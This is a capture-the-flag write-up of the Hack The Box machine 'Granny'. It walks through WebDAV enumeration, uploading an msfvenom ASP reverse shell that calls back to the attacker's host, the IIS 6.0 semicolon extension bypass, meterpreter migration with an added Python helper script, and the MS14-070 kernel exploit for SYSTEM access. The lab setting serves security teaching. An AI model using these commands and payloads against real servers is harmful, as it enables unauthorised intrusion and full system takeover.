Granny is a surprisingly challenging box if you don’t use metasploit for the initial compromise. This machine tests the user’s ability to enumerate web services, exploit WebDAV, and use metasploit to escalate privileges.

Step 1: Enumerate with NMAP

We start our investigation by enumerating with NMAP.

➜  granny nmap -v -A 10.129.95.234 -Pn      
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-24 12:47 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:47
Completed Parallel DNS resolution of 1 host. at 12:47, 0.00s elapsed
Initiating Connect Scan at 12:47
Scanning 10.129.95.234 [1000 ports]
Discovered open port 80/tcp on 10.129.95.234
Completed Connect Scan at 12:47, 6.98s elapsed (1000 total ports)
Initiating Service scan at 12:47
Scanning 1 service on 10.129.95.234
Completed Service scan at 12:47, 6.07s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.95.234.
Initiating NSE at 12:47
Completed NSE at 12:47, 5.04s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.13s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Nmap scan report for 10.129.95.234
Host is up (0.027s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Tue, 24 Jan 2023 17:47:32 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Type: Microsoft-IIS/6.0
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After many scanning attempts we are finally presented with a valid result. This box already seems a bit unreliable, but we are shown that port 80 is the only open port (the other 999 are filtered). IIS 6.0 is running on the box, and the http-methods and http-webdav-scan scripts show that WebDAV is enabled with PUT, COPY and MOVE allowed: a client can write files into the web root and rename them, which may give us a way to plant and execute code. Let’s take a look at the WebDAV service.

Step 2: Enumerating WebDAV

We can use a program called cadaver, a command-line WebDAV client, to interact with the share. We only need to supply the target’s IP address; the server never prompts for credentials.

➜  granny cadaver 10.129.95.234             
dav:/> ls
Listing collection `/': succeeded.
Coll:   _private                               0  Apr 12  2017
Coll:   _vti_bin                               0  Apr 12  2017
Coll:   _vti_cnf                               0  Apr 12  2017
Coll:   _vti_log                               0  Apr 12  2017
Coll:   _vti_pvt                               0  Apr 12  2017
Coll:   _vti_script                            0  Apr 12  2017
Coll:   _vti_txt                               0  Apr 12  2017
Coll:   aspnet_client                          0  Apr 12  2017
Coll:   images                                 0  Apr 12  2017
	_vti_inf.html                       1754  Apr 12  2017
	iisstart.htm                        1433  Feb 21  2003
	pagerror.gif                        2806  Feb 21  2003
	postinfo.html                       2440  Apr 12  2017
dav:/> 

We can see the files hosted on the web server, and because the server accepts PUT we can also write to it. After searching Google, we find the following page, which details uploading files to a WebDAV server: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav. Perhaps we can upload a reverse shell and trigger it by visiting the page in a web browser.

Step 3: Generating a Reverse Shell with Meterpreter

We can use the following command to generate a reverse shell with meterpreter.

➜  granny msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.86 LPORT=4444 -f asp > rev_shell.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of asp file: 38110 bytes

We use a meterpreter reverse shell for the payload and specify the output format as asp: IIS 6.0 serves classic ASP pages, which is what -f asp produces (the aspnet_client directory shows ASP.NET is present too, but -f aspx would be the format for that). LHOST is our own address, and the handler in Step 5 must use the same payload, LHOST and LPORT.

Step 4: Uploading the Reverse Shell

We can use cadaver to upload the reverse shell. The upload filter rejects a direct PUT of an .asp file, so we upload it with a .txt extension and then use COPY to create a copy named rev_shell.asp;.txt. IIS 6.0 stops parsing the file name at the semicolon, so it treats the copy as an .asp page and executes it, and the COPY method is not subject to the extension check that PUT is.

dav:/> put rev_shell.txt
Uploading rev_shell.txt to `/rev_shell.txt':
Progress: [=============================>] 100.0% of 38110 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll:   _private                               0  Apr 12  2017
Coll:   _vti_bin                               0  Apr 12  2017
Coll:   _vti_cnf                               0  Apr 12  2017
Coll:   _vti_log                               0  Apr 12  2017
Coll:   _vti_pvt                               0  Apr 12  2017
Coll:   _vti_script                            0  Apr 12  2017
Coll:   _vti_txt                               0  Apr 12  2017
Coll:   aspnet_client                          0  Apr 12  2017
Coll:   images                                 0  Apr 12  2017
	_vti_inf.html                       1754  Apr 12  2017
	iisstart.htm                        1433  Feb 21  2003
	pagerror.gif                        2806  Feb 21  2003
	postinfo.html                       2440  Apr 12  2017
	rev_shell.txt                      38110  Jan 24 12:58
dav:/> copy rev_shell.txt rev_shell.asp;.txt
Copying `/rev_shell.txt' to `/rev_shell.asp%3b.txt':  succeeded.

Step 5: Triggering the Reverse shell

We will first need to set up a Metasploit handler (exploit/multi/handler) to catch the reverse shell connection. Its payload, LHOST and LPORT must match what we gave msfvenom; the handler defaults to generic/shell_reverse_tcp, so we change the payload and set LHOST.

➜  granny msfconsole                                                                                     
						  

       =[ metasploit v6.2.37-dev-                         ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post       ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]


msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.


msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 

After we have supplied the necessary information for our handler we are able to trigger our reverse shell by navigating to http://10.129.95.234/rev_shell.asp;.txt.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 
[*] Sending stage (175686 bytes) to 10.129.95.234
[*] Meterpreter session 7 opened (10.10.14.86:4444 -> 10.129.95.234:1032) at 2023-01-24 13:26:00 -0500

Step 6: Migrating Processes

We now have a meterpreter session on the victim machine. The ps listing below shows our payload running as a svchost.exe copy dropped in C:\WINDOWS\Temp (PID 2536), spawned by the IIS worker process w3wp.exe (PID 2192); IIS can recycle that worker at any time and take our session with it. The next step is to migrate into another process with the same user (NT AUTHORITY\NETWORK SERVICE) and architecture (x86), such as wmiprvse.exe (PID 1992), which gives us a more stable connection.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 764   392   svchost.exe
 796   392   svchost.exe
 876   1084  cidaemon.exe
 944   392   spoolsv.exe
 988   392   msdtc.exe
 1084  392   cisvc.exe
 1132  392   svchost.exe
 1188  392   inetinfo.exe
 1224  392   svchost.exe
 1328  392   VGAuthService.exe
 1404  392   vmtoolsd.exe
 1512  392   svchost.exe
 1616  392   svchost.exe
 1792  392   dllhost.exe
 1964  392   alg.exe
 1992  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2192  1512  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2372  1084  cidaemon.exe
 2420  1084  cidaemon.exe
 2448  584   wmiprvse.exe
 2536  2192  svchost.exe        x86   0                                      C:\WINDOWS\Temp\rad961F0.tmp\svchost.exe
 3532  344   logon.scr
 3676  2260  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe

meterpreter > migrate -P 1992
[*] Migrating from 2536 to 1992...
[*] Migration completed successfully.
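As an added example (not from the original post), a small script that applies the migration reasoning above to a ps listing: it parses the table, walks the parent chain of the payload process, and ranks candidates by same architecture, same user token, not an ancestor of the current process, and service host before shell. The table is copied from the ps output above, trimmed to the relevant rows; the ranking rules are my assumption of usual practice, not a Metasploit feature.

```python
"""Choose a process to migrate into from meterpreter 'ps' output.

Added example, not from the original writeup. PS_OUTPUT is copied from the ps
listing above, trimmed to the rows that matter; the selection rules are the
usual ones for a non-elevated Windows session and are an assumption here.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name arch session user path")

# PID PPID Name [Arch Session User Path]. User may contain single spaces or be
# empty; at least two spaces separate it from Path, which contains none.
_ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)"
                  r"(?:\s+(x86|x64)\s+(\d+)\s+(.*?)\s{2,}(\S.*))?\s*$")

PS_OUTPUT = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 4     0     System
 272   4     smss.exe
 344   272   winlogon.exe
 392   344   services.exe
 584   392   svchost.exe
 1188  392   inetinfo.exe
 1512  392   svchost.exe
 1992  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2192  1512  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2448  584   wmiprvse.exe
 2536  2192  svchost.exe        x86   0                                      C:\WINDOWS\Temp\rad961F0.tmp\svchost.exe
 3676  2260  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
"""

VOLATILE = {"cmd.exe", "logon.scr"}  # likely to exit soon, taking the session with it


def parse_ps(text):
    """Parse the ps table into Proc rows; header, rule and blank lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            pid, ppid, name, arch, session, user, path = m.groups()
            procs.append(Proc(int(pid), int(ppid), name, arch, session,
                              (user or "").strip(), path))
    return procs


def parent_chain(procs, pid):
    """PIDs of pid's ancestors, nearest first, following PPID until it runs out."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid and by_pid[pid].ppid != pid:
        pid = by_pid[pid].ppid
        chain.append(pid)
    return chain


def migration_targets(procs, current_pid, user, arch="x86"):
    """Candidate processes, best first.

    Rules (assumed usual practice): same architecture and same user as the
    token we hold, not ourselves, not an ancestor (w3wp.exe owns the temp
    process IIS spawned for the payload and can recycle it), and service hosts
    ahead of shells. Rows ps shows without Arch/User are processes our token
    could not open, so they are skipped.
    """
    ancestors = set(parent_chain(procs, current_pid))
    wanted = [p for p in procs
              if p.pid != current_pid and p.arch == arch and p.user == user
              and p.pid not in ancestors]
    return sorted(wanted, key=lambda p: (p.name.lower() in VOLATILE, p.pid))


def best_target(procs, current_pid, user, arch="x86"):
    """PID to hand to 'migrate -P', or None when nothing suitable is listed."""
    targets = migration_targets(procs, current_pid, user, arch)
    return targets[0].pid if targets else None


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    me, user = 2536, r"NT AUTHORITY\NETWORK SERVICE"  # our PID and w3wp's user, per ps
    print("ancestors of %d:" % me, parent_chain(procs, me))
    for p in migration_targets(procs, me, user):
        print("candidate %-5d %s" % (p.pid, p.name))
    print("meterpreter > migrate -P %s" % best_target(procs, me, user))
```

With the listing above it prints the ancestor chain 2536 -> 2192 (w3wp.exe) -> 1512 -> 392 and so on, and suggests migrate -P 1992, with cmd.exe (PID 3676) as the fallback. The second wmiprvse.exe (PID 2448) is skipped because ps could not read its architecture or user, which means our NETWORK SERVICE token could not open it and an injection into it would almost certainly be refused as well.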

Step 7: Finding Exploits with the Local Exploit Suggester

Afterwards, we can send the current meterpreter session to the background with the background command and load our next Metasploit module. We will use the local exploit suggester to find potential privilege escalation exploits; it runs the check method of every local exploit for the session’s platform and reports which ones think the target is vulnerable.

meterpreter > 
Background session 7? [y/N]  
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 7
session => 7
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          7                yes       The session to run this module on
   SHOWDESCRIPTION  true             yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.95.234 - Collecting local exploits for x86/windows...
[*] 10.129.95.234 - 176 exploit checks are being tried...
[+] 10.129.95.234 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
  This module will create a new session with SYSTEM privileges via the 
  KiTrap0D exploit by Tavis Ormandy. If the session in use is already 
  elevated then the exploit will not run. The module relies on 
  kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
[+] 10.129.95.234 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
  This module exploits a NULL Pointer Dereference in win32k.sys, the 
  vulnerability can be triggered through the use of TrackPopupMenu. 
  Under special conditions, the NULL pointer dereference can be abused 
  on xxxSendMessageTimeout to achieve arbitrary code execution. This 
  module has been tested successfully on Windows XP SP3, Windows 2003 
  SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 
  and Windows 2008 R2 SP1 64 bits.
[+] 10.129.95.234 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
  A vulnerability within the Microsoft TCP/IP protocol driver 
  tcpip.sys can allow a local attacker to trigger a NULL pointer 
  dereference by using a specially crafted IOCTL. This flaw can be 
  abused to elevate privileges to SYSTEM.
[+] 10.129.95.234 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
  This module exploits improper object handling in the win32k.sys 
  kernel mode driver. This module has been tested on vulnerable builds 
  of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
[+] 10.129.95.234 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
  This module exploits the vulnerability in mrxdav.sys described by 
  MS16-016. The module will spawn a process on the target system and 
  elevate its privileges to NT AUTHORITY\SYSTEM before executing the 
  specified payload within the context of the elevated process.
[+] 10.129.95.234 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
  Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to 
  achieve a SYSTEM handle for elevation of privilege. Currently the 
  module does not spawn as SYSTEM, however once achieving a shell, one 
  can easily use incognito to impersonate the token.
[+] 10.129.95.234 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
  This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due 
  to the usage of uninitialized data which allows to corrupt memory. 
  At the moment, the module has been tested successfully on Windows XP 
  SP3, Windows 2003 SP1, and Windows 7 SP1.
[*] Running check method for exploit 41 / 41
[*] 10.129.95.234 - Valid modules for session 7:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 17  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 18  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 19  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 22  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 23  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 24  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 25  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 26  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 27  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
 28  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 29  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 31  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 32  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 33  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 34  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The target is not exploitable.
 36  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 39  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed

Step 8: Exploiting the Target

We are presented with a list of potential exploits, and after trying a few we find progress with exploit/windows/local/ms14_070_tcpip_ioctl, a kernel exploit for the tcpip.sys IOCTL flaw whose only target is Windows Server 2003 SP2, which matches the build the suggester reported (5.2 build 3790, Service Pack 2). LHOST carries over from the handler, and LPORT is already 4445, so the new handler does not clash with the one still listening on 4444.

msf6 exploit(multi/handler) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  7                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.86      yes       The listen address (an interface may be specified)
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 7
session => 7
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.86:4445 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175686 bytes) to 10.129.95.234
[*] Meterpreter session 8 opened (10.10.14.86:4445 -> 10.129.95.234:1033) at 2023-01-24 13:27:03 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We only have to supply the session; the local host and port were already set. After running the exploit we are immediately granted a session as NT AUTHORITY\SYSTEM, as getuid confirms. The last step is to navigate to each user’s desktop and submit the flags.

This box is much more troublesome than this post may indicate, as I have left out all the instances of the various shells crashing and web pages failing to load. Unenjoyable is the first word that comes to mind when I reflect on the process of rooting this box, largely due to the unstable nature of this server.